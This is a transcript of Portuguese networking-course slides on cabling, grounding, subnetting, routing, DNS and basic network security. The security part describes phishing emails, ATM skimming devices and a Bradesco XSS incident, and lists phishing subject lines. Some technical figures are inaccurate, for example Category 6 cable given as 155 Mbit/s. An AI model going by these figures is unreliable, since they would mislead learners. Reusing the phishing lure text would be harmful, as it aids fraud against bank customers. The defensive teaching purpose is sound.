senai - curso avancado redes
DESCRIPTION
SENAI - CURSO AVANCADO REDESTRANSCRIPT
1
REDES AVANÇADAS
08/02/2011 Eudes Danilo Mendonça
http://www.4shared.com/file/59507480/8e48421c/
SENAI_-_CURSO_AVANCADO_REDES.html
I - Revisão dos Conhecimentos Básicos de Redes: Conceitos de Redes,
equipamentos, periféricos e conexão da rede
II - Noções de Cabeamento Estruturado: Conhecimento de Asbuilt,
certificação de uma rede, elaboração de um anteprojeto de rede,
elaboração de um projeto de redes.
III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo
do protocolo TCP/IP, subnet de rede, roteamento de rede
IV - Segurança de Rede: Noções de segurança física e lógica, objetivos,
introdução a ataques, vulnerabilidade, como previnir ataques
V - Windows 2003 Server: Instalação, configuração de serviços (DHCP,
DNS, WINS, IIS, FTP), implementação de GPO, servidor de arquivos,,
Active Direct, Segurança em nível de recursos - Permissões de
arquivos, Backup e Recuperação, Logs e Serviços.
2
Sinopse:
Materiais do curso e outros do autor
Senai
- Apostila
http://www.4shared.com/file/51511261/48a51bbd/CUR
SO_TCNICO_EM_INFORMTICA_-_SENAI_-
_TURMA_AVANCADA.html
- Redes Avançadas Power Point
http://www.4shared.com/file/59507480/8e48421c/SENA
I_CURSO_AVANCADO_REDES.html
- Redes Básicas – Power Point
http://www.4shared.com/file/72507083/506ae8fd/SENAI
_-_CURSO_BASICO_DE_REDES.html
3
Materiais Complementares do curso
Furukawa Fundamental
http://www.4shared.com/file/eHNayTeu/Curso_FCP_-_Fundamental.html
Furukawa Master
http://www.4shared.com/account/file/P0G-5nuC/Curso_FCP_-
_Master.html
Linux
http://www.4shared.com/file/G-MmySHe/Material_Linux.html
Windows Server
http://www.4shared.com/file/9qOyta7c/MATERIAL_-_windows.html
Redes Wireless
http://www.4shared.com/file/N1Lpak3B/Redes_Wireless.html
Software de Redes Wireless
http://www.4shared.com/file/n_l8dnIm/Softwares_Wireless.html
4
Materiais de Universidades
Segurança de Sistemas
http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html
Firewall
http://www.4shared.com/file/40014575/5e5292cb/Firewall.html
Script Linux
http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html
Vírus
http://www.4shared.com/file /42802741/12513457/virus.html
Criptografia
http://www.4shared.com/file/43349581/53517583/Criptografia.html
Segurança de Redes
http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computad
ores.html
Desempenho de Sistemas
http://www.4shared.com/document/tfm6UNU6/Desempenho_de_Sistemas_-
_Cesup.html
Interconexão de Redes
‘http://www.4shared.com/file/AXu6iWm7/Interconexo_de_redes.html
5
I – Revisão dos Conhecimentos
Básico de Redes
6
O que é Redes de computadores?
• Possibilitar o compartilhamento de informações (programas e dados) armazenadas nos
computadores da rede;
• Permitir o compartilhamento de recursos associados às máquinas interligadas;
• Permitir a troca de informações entre os computadores interligados;
• Permitir a troca de informações entre usuários dos computadores interligados;
• Possibilitar a utilização de computadores localizados remotamente;
• Permitir o gerenciamento centralizado de recursos e dados;
• Melhorar a segurança de dados e recursos compartilhados
7
Porque ligar micros em rede?
Palavra chave “Compartilhamento”.
8
Tipos de Redes
• Usada em redes pequenas (normalmente até 10 micros);
• Baixo Custo;
• Fácil implementação;
• Baixa segurança;
• Sistema simples de cabeamento;
• Micros funcionam normalmente sem estarem conectados a rede;\
• Micros instalados em um mesmo ambiente de trabalho;
• Não existe um administrador de rede;
• Não existe micros servidores;
• A rede terá problemas para crescer de tamanho.
9
Ponto x Ponto
Cliente x Servidor
Deseja ter uma maior segurança na rede. (Nesse
tipo de rede aparece uma figura denominada
servidor. O servidor é um computador que oferece
recursos especializados, para os demais micros da
rede, ao contrário do que acontece com a rede
ponto-a-ponto onde os computadores compartilham
arquivos entre si e também podem estar fazendo um
outro processamento em conjunto).
Outra vantagem das redes cliente/servidor é a forma
centralizada de administração e configuração, o que
melhora a segurança e organização da rede.
10
Tipos de Servidores Servidor de Arquivos: É um servidor responsável pelo armazenamento de
arquivos de dados – como arquivos de texto, planilhas eletrônicas, etc... É
importante saber que esse servidor só é responsável por entregar os dados
ao usuário solicitante (cliente), nenhum processamento ocorre nesse servidor,
os programas responsáveis pelo processamento dos dados dos arquivos deve
estar instalados nos computadores clientes.
Servidor de Impressão: É um servidor responsável por processar os pedidos
de impressão solicitados pelos micros da rede e enviá-los para as
impressoras disponíveis. Fica a cargo do servidor fazer o gerenciamento das
impressões.
Servidor de Aplicações: É responsável por executar aplicações do tipo
cliente/servidor como, por exemplo, um banco de dados. Ao contrário do
servidor de arquivos, esse tipo de servidor faz processamento de
informações.
Servidor de Correio Eletrônico: Responsável pelo processamento e pela
entrega de mensagens eletrônicas. Se for um e-mail destinado a uma pessoa
fora da rede, este deverá ser passado ao servidor de comunicação (firewall)
Servidor de Comunicação (Firewall): Usado para comunicação da sua rede
com outras redes, como a Internete Se você acessa a Internet através de uma
linha telefônica convencional, o servidor de comunicação pode ser um
computador com uma placa de modem ou conexões com ADSL ou LPCD.
11
Vantagens e Desvantagem do Cliente x Servidor Custo Maior desempenho do que as redes ponto-a-ponto;
Implementação necessita de especialistas;
Melhor desempenho que as redes ponto-a-ponto;
Alta segurança;
Configuração e manutenção na rede é feita de forma centralizada;
Existência de servidores, que são micros capazes de oferecer recursos
aos demais micros da rede
12
II - Noções de Cabeamento
Estruturado
13
Cabeamento Estruturado Conector RJ45 Macho
14
Cabeamento Estruturado Cabo UTP
UTP Color Codes
Par 1 Branco-Azul (BA) / Azul (A)
Par 2 Branco-Laranja (BL) / Laranja (L)
Par 3 Branco-Verde (BV) / Verde (V)
Par 4 Branco-Marrom (BM) / Marrom (M)
15
Cabeamento Estruturado Cabo UTP / CATEGORIAS Categoria 1 – cabo de par trançado tradicional, que é o utilizado para
telefonia (instalado antes de 1983). Não é recomendado para utilização
em redes locais.
Categoria 2 – cabo certificado para transmissão de dados (possui 4 pares
trançados). Sua utilização em redes também não é recomendável.
Categoria 3 – esta categoria suporta 10 Mbit/sec numa rede Ethernet,
4Mbit/s em uma Token Ring. Este cabo permite que até quatro telefones
normais ou dois multilinhas sejam conectados ao equipamento da
companhia telefônica.
Categoria 4 – esta categoria suporta taxas de transmissão de até 16
Mbit/s em uma rede Token Ring. Este cabo possui quatro pares.
Categoria 5 – possui 4 pares trançados com oito torções. Suporta taxas
de transmissão de 100 Mbit/s. Sua utilização é adequada para redes Fast
Ethernet e redes ATM. No início dos anos 90, 60% dos edifícios possuíam
este tipo de cabo (EUA).
Categoria 6 – também possui 4 pares trançados. Suporta taxas de
transmissão de até 155 Mbit/s. Sua utilização é adequada a redes Fast
Ethernet para transmissão de dados e voz.
16
Cabeamento Estruturado Crimpador
Testador
17
Cabeamento Estruturado Delay É um dos itens mais importantes, pois a estruturação física pode
influenciar na performance e velocidade da rede. É ideal que
tenha o menor número de segmentação e quando ocorrer a
segmentação que seja centralizado os servidores, pontos de saída
da rede e principais clientes no switch principal.
18
Cabeamento Estruturado Processo da Crimpagem
Normal - Padronização EIA/TIA 568ª – Conhecida como
“seqüência de crimpagem de normal”. Utilizada para conexão de
um microcomputador a um HUB ou SWITCH.
19
EIA/TIA-568ª
1. Branco-Verde
2. Verde
3. Branco-Laranja
4. Azul
5. Branco-Azul
6. Laranja
7. Branco-Marrom
8. Marrom
Cabeamento Estruturado Crossover - Um cabo crossover consiste na interligação de 2
(dois) computadores pelas respectivas placas de rede sem ser
necessário a utilização de um concentrador (Hub ou Switch) ou a
ligação de modems a CABO com a maquina cliente com conectores
do tipo RJ45. A alteração dos padrões das pinagens dos cabos torna
possível a configuração de cabo crossover ou cabo direto. A ligação é
feita com um cabo de par trançado (na maioria das vezes) onde se
tem: em uma ponta o padrão T568A, e, em outra o padrão T568B
(utilizado também com modems ADSL).
20
1ª ponta do cabo
branco verde
verde
branco laranja
azul
branco azul
laranja
branco marrom
marrom
2ª ponta do cabo
branco laranja
laranja
branco verde
azul
branco azul
verde
branco marrom
marrom
Cabeamento Estruturado 1ª Prática: Processo da Crimpagem
21
Cabo Normal
22
Cabo Crossover
23
Cabeamento Estruturado Certo
Errado
24
Cabeamento Estruturado O que não pode ocorrer
25
Cabeamento Estruturado O que não pode ocorrer
26
Cabeamento Estruturado
27
Cabeamento Estruturado
28
Cabeamento Estruturado
29
Cabeamento Estruturado
30
2ª Prática: Processo da Crimpagem
Cabeamento Estruturado
31
Cabeamento Estruturado
32
Cabeamento Estruturado
33
Cabeamento Estruturado
34
Cabeamento Estruturado
35
Sugestão para a Rede Elétrica
Ideal ter a cada circuito de 10 A até 3
tomadas;
Não permitir que sejam ligados outros
equipamentos como: Copiadoras,
ventiladores, motores elétricos, ou
qualquer outro que exija ou produza
ruído na linha.
36
Sugestão para a Rede Elétrica
37
Sugestão para a Rede Elétrica
As tomadas devem ser do tipo universal
de três pinos (tripolares) e a ligação
fase/neutro/terra
As tensões aproximadas na rede elétrica deverão ser as
seguintes:
Entre terra e fase = 117 V
Entre neutro e fase = 115 V
Entre terra e neutro = 2,5 V(valor Maximo tolerado)
38
Sugestão para a Rede Elétrica
39
Aterramento O terra dos equipamentos de informática DEVE ser
totalmente independente dos demais terras
existentes.
Observando o seguinte na instalação:
Ser construído á distância mínima de 2,40m dos outros
terras do quadro e do neutro e a uma distância
mínima de 25,00 do terra de pára-raios.
O cabo que liga as barras de aterramento ao quadro
deve ser encapado, possuir bitola compatível com a
distancia entre o sistema e o quadro, e NÃO
DEVERÁ ESTAR NUNCA CONECTADO AO
NEUTRO.Não são aconselháveis distâncias maiores
que 50m entre o terra e o quadro de distribuição.
40
Aterramento
Material necessário para um aterramento simples:
- 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de
diâmetro.
- 6 abraçadeiras de bronze para as barras de cobre.
- 10 metros de fio isolado, de bitola idêntica á dos fios fase e
neutro.
- Sal grosso, carvão vegetal e enxofre em quantidades suficientes
para cobrir o poço dos eletrodos.
- Água destilada suficiente para regar a mistura.
- As barras de cobre são chamadas eletrodos de aterramento; dão
uma referência de terra de 0 volte uma conexão á terra para
descargas elétricas atmosféricas. Também fornecem uma
trajetória de impedância baixa á terra ( valor máximo de 25
ohms).
41
Aterramento
42
Aterramento
Consequências da falta de aterramento:
- Aparição de BAD CLUSTERS no HD ou até
mesmo a perda total. Isto não demora a
acontecer.
- Você poderá perder seu HD em 2 ou 3 meses.
- Danos na placa mãe.
- Danos na memória, que podem vir a causar
perda repentina de dados e ou congelamento
de todo o sistema.
43
DOCUMENTAR UMA REDE
Físicamente:
- Asbuilt
Lógicamente:
- Software Inventário; (http://www.softwarepublico.gov.br/spb/ver-
comunidade?community_id=3585)
- Help Desk; (http://ocomonphp.sourceforge.net/)
- Analyzer Network; (Network supervisor – 3COM)
- Logs (Firewall, event view, /var/log/messages)
44
Criação de AnteProjeto de Rede Veja quando falamos em projeto, não
queremos e não vamos formar
engenheiros aqui, nossa intenção e
mostrar que uma documentação bem
feita pode ser o diferencial dentro desta
área , o projeto pode ser escrito, não
necessariamente um desenho, lógico
que se possuir o desenho é muito
melhor, mesmo porque hoje existem
ferramentas para auxiliar neste
propósito.
45
Criação de AnteProjeto de Rede
46
Elaboração de um Projeto de Rede
47
Informações repassada pelo empresa:
- 1 Caso: Rede 100 % cabeada;
- 2 Caso: Rede Mista
Criação da Documentação do Projeto:
- Crianção do Site Survey;
- Criação do anteprojeto;
- Entrega do Asbuilt pela empresa prestadora
do serviço;
Criação dos Site Survey – 1 Caso
48
Criação dos Site Survey – 2 Caso
49
Visão Macro
Exercício: Criação de anteprojeto
51
Informações repassada pelo empresa (Site
Survey): - As paredes externas são de cerâmico aparente e as paredes
internas, incluindo as salas laterais , de reboco liso e pintado;
- O teto é de forro falso e o piso é de granito natural;
- O departamento de telemarketing possui divisórias baixas
acústicas em formas de “baias”, de madeira, revestida com
espuma de poliuretano e tecido grosso;
- Toda iluminação é feita com luminárias com 4 lâmpadas
fluorescentes de 40 W x 220 V e localizada no centro
geométrico de cada ambiente;
- Altura entre o forro e o piso é de 2,6m;
- A sala de treinamento, recebe freqüentemente pessoas não
ligadas a empresa, além disso seu layout é constantemente
alterado;
Exercício: Criação de anteprojeto
52
53
III – Noções de Protocolo de
rede
Protocolos - Definição
55
A Mensagem em Camadas
Remetente
Mensagem
Escrita
Envelope
Agência
Rodovia/Malote
Envelope
Agência
Mensagem
Escrita
Destinatário -Você tem uma idéia e
deseja comunica-la a
outra pessoa
-Tem de escolher a forma
de expressar essa idéia
-Você decide como de
uma forma apropriada
-Enfim, de fato expõe sua
idéia
Comparações das camadas
TCP/IP e Modelo OSI
58
Vídeo:
Funcionamento de todas as Camadas
59
O que configurar ?
IP
MASCARA
GATEWAY
DNS
60
Onde, o que e por que
Configurar
IP e MASCARA
62
IP
TIPO INTERVALO
Privado de 10.0.0.0 a 10.255.255.255 (10.0.0.0 /8)
de 172.16.0.0 a 172.31.255.255 (172.16.0.0 /12)
de 192.168.0.0 a 192.168.255.255 (192.168.0.0 /16)
Multicast de 224.0.0.0 à 239.255.255.255
Público De 0.0.0.0 à 223.255.255.255
Experimental 240.0.0.0 á 240.255.255.254
63
M
A
S
C
A
R
A
64
Normal Calculo Renderizado Qtd de host
255.128.0.0 /9 8.388.606
255.192.0.0 /10 4.194.302
255.224.0.0 /11 2.097.150
255.240.0.0 /12 1.048.574
255.248.0.0 /13 524.286
255.252.0.0 /14 262.142
255.254.0.0 /15 131.070
255.255.0.0 /16 65.534
255.255.128.0 256 – (64 + 32 + 16 + 8 + 4 + 2 + 1 + 1) /17 (128 x 256) – 2 = 32.766
255.255.192.0 256 – (32 + 16 + 8 + 4 + 2 + 1 + 1) /18 (64 x 256) – 2 = 16.382
255.255.224.0 256 – ( 16 + 8 + 4 + 2 + 1 + 1) /19 (32 x 256) -2 = 8.190
255.255.240.0 256 - ( 8 + 4 + 2 + 1 + 1) /20 (16 x 256) -2 = 4.094
255.255.248.0 256 - ( 4 + 2 + 1 + 1) /21 (8 x 256) - 2 = 2.046
255.255.252.0 256 ( 2 + 1 + 1) /22 (4 x 256) – 2 = 1.022
255.255.254.0 256 - (1 + 1 ) /23 (2 x 256) -2 = 510
255.255.255.0 255 /24 256 -2 = 254
255.255.255.128 256 - (128) /25 (256 – 128) – 2 = 126
255.255.255.192 256 - (128 + 64) /26 (256 – 192) -2 = 62
255.255.255.224 256 (128 + 64 + 32) /27 (256 – 224) -2 = 30
255.255.255.240 256 ( 128 + 64 + 32 + 16) /28 (256 – 240) -2 = 14
255.255.255.248 256 – (128 + 64 + 32+ 16 + 8) /29 (256 – 248) – 2 = 6
255.255.255.252 256 – (128 + 64 + 32 + 16 + 8 + 4) /30 (256 – 252) -2 = 2
Máscara de Sub-Rede de
Tamanho Variável (VLSM)
65
Redes VLSM, sub-redes de classe C (255.255.255.0 ou /24)
66
Endereços IP Endereço IP: Indentificador de Rede +
Indentificador de HOST
Identificador da
rede
Identificador do
host
Endereço IP de 32 bits
REDE
internet
REDE REDE
REDE
hosts com omesmoidentificador derede.
hosts comidentificadores
de rededistintos.
host
67
Como atribuir IP’s para rede
abaixo?
...
230 computadores 200 computadores
...
SÃO PAULO CURITIBA
68
Como Atribuir IP’s para rede abaixo?
...
1000 computadores 2000 computadores
...
SÃO PAULO CURITIBA
500 computadores
...
RIO DE JANEIRO
Redes com poucos micros
Apenas uma classe de rede
192.168.1.0 /24
– Matriz com 100 computadores;
– Filial 1 com 56 computadores;
– Filial 2 com 28 computadores;
– Filial 3 com 10 computadores;
– Todas elas as matriz possuem link PPP
com a matriz;
69
Solucionar Principais Problemas
Usando o Utilitário IPConfig O utilitário IPConfig é muito útil para determinar se as
configurações de rede atuais são desejadas. Vários erros
podem ser detectados através deste utilitário. Execute-o
através de um Prompt de Comando (clique em Start -> Run e
digite CMD), digitando ipconfig /all e teclando Enter.
Solucionar Principais Problemas Conflito de IP: Ocorre quando um IP manual é atribuído à máquina e já
existe outro computador na rede com o mesmo IP. Nesse caso, a tela do
Ipconfig deve se parecer com a seguinte:
Note que os campos IP e Máscara de Subrede estão zerados. Essa é a
principal característica de um conflito de IPs.
- Configuração incompleta: Certifique-se de que os campos DNS Servers e
Default Gateway não estão em branco.
Solucionar Principais Problemas
Note que, como não há servidor DNS e nem Default Gateway
configurados, o computador somente poderá enviar e receber
dados dentro da rede local e com outros computadores
Solucionar Principais Problemas
Usando o Utilitário PING Ela se refere ao utilitário do TCP/IP denominado "Ping", que tem como
função testar se um host está ativo, enviando um pacote de dados para esse host e pedindo uma reposta caso ele esteja online e funcionando corretamente. Então, "pingar" o endereço de loopback simplesmente testa se sua máquina inicializou o TCP/IP corretamente. Para fazer isso, entre em um Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter. Você também poderá pingar no IP da placa assim como de qualquer máquina da rede, assim como por nome dependendo de alguns serviços. Vale ser ressalta que o ping pode ser desabilitado.
Solucionar Principais Problemas Usando o Utilitário NETSTAT e TELNET
NETSTAT – verifica os serviços que localmente a máquina/host está provendo
TELNET: Tem como função testar se o serviço está ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se você local ou remoto da máquina que está provendo o serviço.
GATEWAY
75
Roteamento Indireto
Origem e Destino estão em redes
diferentes
REDE
10.35.143.0
10.35.143.10 10.35.144.15
Tabela de Roteamento
Destino Gateway
10.35.143.0 DIRETO
0.0.0.0 10.35.143.1
Router
REDE
10.35.144.0
Tabela de Roteamento
Destino Gateway
10.35.143.0 10.35.143.1
10.35.144.0 10.35.144.1
....... .......
10.35.143.1 10.35.144.1
Tabela de Roteamento
Destino Gateway
10.35.144.0 DIRETO
0.0.0.0 10.35.144.1
Exemplo de roteamento Exemplo de uma rede Intranet constituída de duas
redes físicas conectadas por um roteador.
192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4
192.168.1.5
192.168.0.5
192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4
roteador
interno
rede 192.168.0.x
rede 192.168.1.xservidor
rede interna de uma empresa.
Tabelas de Roteamento
79
Exemplo de Tabela de Roteamento
TABELA DO ROTEADOR 1:
Rede Gateway Interface
200.134.51.0 (255.255.255.0) 200.134.51.1 200.134.51.1
200.17.98.0 (255.255.255.0) 200.17.98.23 200.17.98.23
0.0.0.0 (0.0.0.0) 200.130.0.2 200.130.0.1
roteador
1
roteador
2
INTERNET
REDE 200.134.51.X
REDE 200.17.98.X
200.17.98.23
200.130.0.1 200.130.0.2
200.134.51.1
80
Exercício 1 Construa a tabela de roteamento do Roteador 1
200.17.98.0 200.17.98.23
INTERNET
1
255.255.255.0
200.134.51.0
255.255.255.0
200.17.98.1 200.134.51.1
3 INTERNET
2
200.0.0.1 200.0.0.2
81
TABELA DE ROTEAMENTO
Rede Destino
Mascara
Gateway
Custo
Interface
TABELA DE ROTEAMENTO
Rede Destino
Mascara
Gateway
Custo
Interface
200.134.51.0 255.255.255.0 200.134.51.1 1 200.134.51.1
200.17.98.0 255.255.255.0 200.17.98.1 1 200.17.98.1
0.0.0.0 0.0.0.0 200.0.0.1 1 200.0.0.2
0.0.0.0 0.0.0.0 200.17.98.23 2 200.17.98.1
83
Exercício 2: Utilizando a classe C: 200.0.0.0 (255.255.255.0)
– A) distribua os IP’s nas duas redes abaixo
– B) defina a tabela de roteamento do roteador 1.
INTERNET 1 2
100
computadores
100
computadores
DNS
84
DNS - Domain Name Service Padrão Aberto para Resolução de
Nomes Hierárquicos
– Agrupa nomes em domínios.
– A árvore de nomes é armazenada num banco de dados distribuído.
Especificações do DNS
– RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
• Expecificações da Internet Task Force
– Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley
University para a versão 4.3 SD Unix
Demonstrações: Serviços de Nomes
A função principal dos serviços de nomes
é traduzir nomes de domínio para os seus
respectivos endereços IP’s.
www.oi.com www.cade.com
www.oi.com = 10.10.10.1 www.cade.com = 35.35.2.80
www.av.com www.ufg.br
www.av.com = 20.20.20.80 www.ufg.br =50.75.96.8
Servidor DNS
Elaboração de Projeto
Criar uma formulário / checklist de
informações que deverão que serão
coletadas junto a conversa inicial.
89
Qual a finalidade ?
Quem vai acessar (de onde, como, que solução) ?
Quantos computadores ?
De onde vai ser o acesso ?
Q o s ?
Local Físico (disponibilidade para cabeamento)
92
V - Segurança de Redes
93
O sistema informático mais seguro
não é utilizável
O sistema informático mais utilizável
é inseguro
Só existe um computador 100%
seguro, o desligado.
94
Introdução
A Segurança da Informação pode ser definida como a proteção de dados contra a revelação acidental ou intencional a pessoas não autorizadas, e contra alterações não permitidas.
A segurança no universo computacional divide-se em: – Segurança Física
– Segurança Lógica
O que você está tentando
proteger?
Seus dados
Integridade
Privacidade
Disponibilidade
Seus recursos
Sua reputação
95
Segurança Privacidade Confiabilidade Integridade
Princípios de Segurança
Contra o que você está tentando
se proteger?
Roubo de senhas
Engenharia Social
BUG & Backdoors
Falha de autenticação
Falha de protocolo
Obtendo Informações
Negando serviços (DoS)
...
97
98
Objetivos da Segurança
O objetivo da segurança da informação
abrange desde uma fechadura na porta da
sala de computadores até o uso de
técnicas criptográficas sofisticadas e
códigos de autorização.
99
Tipos de Ataques:
• Ataques passivos (interceptação)
• Ataques ativos (interrupção, modificação e
Fabricação)
Ataques Passivos
Intercepção
Análise do
conteúdo das
mensagens
Análise do tráfego
Ataques passivos
O objetivo é obter informação que está a ser transmitida.
Este tipo de ataques é muito difícil de detectar. O esforço de
protecção deve ser no sentido da prevenção.
Emissor Receptor
Intercepção
Intercepção
Intercepção – Quando utilizadores não autorizados conseguem
aceder a recursos para os quais não estavam autorizados. É
um ataque à confidencialidade. A parte não autorizada pode ser
uma pessoa, um programa ou um computador. Exemplos:
violação de cabos de comunicação, para capturar dados da
rede, cópia ilícita de pastas e programas, etc.
Ataques Ativos
Interrupção
(Disponibilidade)
Modificação
(Integridade)
Fabricação
(Autenticidade)
Ataques Ativos
Envolvem alguma modificação de dados.
Este tipo de ataques é muito difícil de prever, já que, para isso,
seria necessário uma proteção completa de todos os tipos de
comunicações e de canais. Por esta razão, o esforço de
protecção deve ser no sentido de os detectar e recuperar dos
atrasos ou estragos entretanto causados.
Emissor Receptor
Interrupção
Interrupção
Interrupção – A informação de um sistema torna-se indisponível ou é destruída. É um ataque à disponibilidade.
Exemplos: Destruição de peças de Hardware, o corte de linhas de comunicação, a inoperância do sistema de ficheiros, etc.
Emissor Receptor
Modificação
Modificação
Modificação – uma parte não autorizada, não só acede à informação, mas também a modifica. É um ataque de integridade. Exemplos: alteração de valores num ficheiro de dados; alteração de um programa para que ele funcione de maneira diferente ou modificação do conteúdo de mensagens transmitidas pela rede.
Emissor Receptor
Fabricação
Fabricação
Fabricação – uma parte não autorizada insere dados falsos no sistema. É um ataque à autenticidade. Exemplos: inserção de mensagens simuladas na rede ou a adição de registos a um ficheiro.
106
O que é ataque?
Ataque é toda ação realizada com
intuito ou não de causar danos.
Uma ameaça é uma potencial violação de
segurança
As ações que podem acarretar a violação são
denominadas de ataques
107
Ameaças
Um ataque típico
108
Anatomia de um ataque
Reconhecimento Varredura
Enumeração
Invasão Escalando
privilégios
Acesso à
informação
Ocultação
de rastros
Negação de
Serviços
Instalação de
back doors
110
111
O que um hacker ataca ?
Aplicações
Banco de dados
Sistemas operacional
Serviços de rede
113
Tipos de ataques conhecidos
• Escutas
– Packet Sniffing – escuta e inspeciona cada pacote da rede
– IP/Session Hijacking – interceptação da seção pelo invasor
• Senha
– Uso de dicionário de senhas
– Força bruta – tentativa e erro
• Outros ataques
– Alteração de site (web defacement)
– Engenharia social
– Ataque físico às instalações da empresa
– Uso de cavalos de tróia e códigos maliciosos
– Trashing – revirar lixo em busca de informações
– Keylog
114
Motivação para o Ataque
• Por quê existem as invasões aos sistemas?
– Orgulho
– Exibicionismo/fama
– Busca de novos desafios
– Curiosidade
– Protesto
– Roubo de informações
– Dinheiro
– Uso de recursos adicionais
– Vantagem competitiva
– Vingança
115
Exemplo: Oliberal 10/02/08
Caso Real
Atualmente 70% das quebras de
segurança corporativas são geradas
internamente.
Perfil do Fraudador*:
• 68% estão na Média e Alta Gerências
• 80% tem curso superior completo
• Predominantemente do Sexo Masculino
• Idade média entre 31 e 40 anos *Pesquisa sobre crimes econômicos - PWC 05
Caso Real
Ex: Email para roubo de informações
118
Ex: Email para roubo de informações
119
Ex: Email para roubo de informações
120
Ex: Email para roubo de informações
121
Ex: Email para roubo de informações
122
Ex: Email para roubo de informações
123
Ex: Email para roubo de informações
124
Ex2: Clonagem de cartão de banco
125
Bocal preparado
Ex2: Clonagem de cartão de banco
126
Imperceptível para o cliente
Ex2: Clonagem de cartão de banco
Micro câmera disfarçada de porta panfleto
Ex2: Clonagem de cartão de banco
128
Visão completa da tela e teclas digitadas
Ex2: Clonagem de cartão de banco
129
Visão completa da tela e teclas digitadas
Ex2: Clonagem de cartão de banco
130
Micro câmera Bateria Antena transmissora
Ex3: Email de promoção (roubo
informação)
131
Ex3: Email de promoção (roubo
informação)
132
Ex4: Antivirus Gratis
133
Ex6: Email Receita Federal
134
Cópia de identidade visual de órgãos
públicos
Pedido de
download de
arquivos /
erros de
português
Cópia de identidade visual de
entidades populares
História
estranha e
mal contada
Necessidade
urgente de
download
Serviço inexistente
Pedido de download de arquivos
Ameaças
Uso de marca popular Distrbuição
muito vantajosa
de prêmios
Pedido de
download de
arquivo
Uso de marca popular
Erro de português
Dívida inexistente
Falta de menção a endereço
por extenso
Erro de português
Falha no site do Bradesco permitiu ataque
XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
141
Criminosos brasileiros conseguiram descobrir um problema em uma página
do Bradesco que permitia que a mesma fosse “alterada” por meio de links,
possibilitando o uso do domínio do banco para todo tipo de atividade
maliciosa.
Para tal, crackers enviaram e-mail em massa contendo um link que
explorava uma falha de XSS (Cross Site Scripting) existente em uma
página localizada em institucional.bradesco.com.br. Se clicado, o link
enviava informações à página que causavam um comportamento
indesejável, fazendo com que argumentos da query string — como é
chamada a parte do link depois do ponto de interrogação (”asp?…”) —
fossem inseridas como código, permitindo o ataque.
Dias antes da publicação desta matéria, a Linha Defensiva notificou o
Bradesco. O banco removeu a página vulnerável dentro de
aproximadamente 48 horas, inutilizando o ataque.
A mensagem contendo o link que explorava a brecha solicitava o
recadastramento das “chaves de segurança” usadas nas transações através
da Internet, convidando o usuário a fazê-lo por meio do link.
Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)
Como é demonstrado na imagem, a maioria dos navegadores e os programas de e-mails
não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo
que a existência do golpe seja percebida.
Embora o e-mail tenha usado uma técnica refinada que facilmente poderia enganar até
mesmo usuários com certa experiência, devido ao link camuflado, erros de ortografia
característicos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-
mail em massa usado pelos criminosos não era compatível com caracteres especiais,
como acentos.
142
Falha no site do Bradesco permitiu ataque
XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
143
XSS
Cross Site Scripting, ou XSS, é um tipo de vulnerabilidade onde determinada página de internet não filtra
suficientemente as informações enviadas pelo navegador web, sendo possível fazê-la exibir conteúdos de
outros sites, ou conteúdos especificados no próprio link ou outra informação.
Um exemplo clássico é a página de busca. Em geral, páginas de buscas exibem na tela a informação que
está sendo procurada (por exemplo, “Você está procurando por: [termo de pesquisa]“). Se a exibição desta
informação não for filtrada corretamente, a informação, em vez de exibida, será interpretada como código
HTML pelo navegador, possibilitando o ataque.
Fóruns, livros de visitas e blogs (este último, devido à função de comentários) podem ser vítimas do XSS
permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetará qualquer usuário
que o ver. Este é o ataque de XSS persistente, ou tipo 2.
O Bradesco foi alvo do XSS impermanente ou não-persistente, também chamado de XSS tipo 1.
O objetivo de ataques XSS é geralmente roubar informações importantes da vítima, tais como os cookies
de autenticação. Porém, XSS também pode ser usado para alterar os sites e usar da confiança depositada
pelo internauta na página para persuadi-lo a enviar informações sigilosas, ou para rodar código malicioso
nos PCs de visitantes.
A Linha Defensiva já noticiou a respeito de brechas semelhantes no YouTube e no Orkut.
Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-
mail e similares não sejam clicados, a não ser quando estava-se esperando absolutamente o e-mail em
questão (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que
possível, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o
que foi indicado no e-mail.
Brechas de XSS tipo 2 são difíceis de serem evitadas pelo usuário, sendo a responsabilidade do site nesses
casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.
Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)
Ao acessar o link, o internauta era direcionado para uma página do Bradesco
(Index_Pesquisa.asp) que, vulnerável a XSS, carregava outra página, hospedada em um
domínio brasileiro (cujo nome não foi divulgado por se tratar de um domínio legítimo
comprometido).
Em ataques XSS, páginas legítimas são usadas de forma maliciosa e um código (no caso
acima, um FRAMESET1) é inserido na página legítima. O conteúdo da página será,
portanto, diferente do esperado.
144
Lista de Hackers fornecida: Amores On-line - cartão virtual - Equipe Carteiro Romântico - Uma pessoa que
lhe admira enviou um cartão
As fotos que eu tinha prometido. Álbum pessoal de fotos
AVG Antivírus - Detectamos que seu E.Mail está enviando mensagens contaminadas com o vírus w32. bugbear
Aviso - você está sendo traído - veja as fotos
Aviso - você está sendo traído - veja as imagens do motel
Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados - Contrato Pendente - Clique para fazer atualização
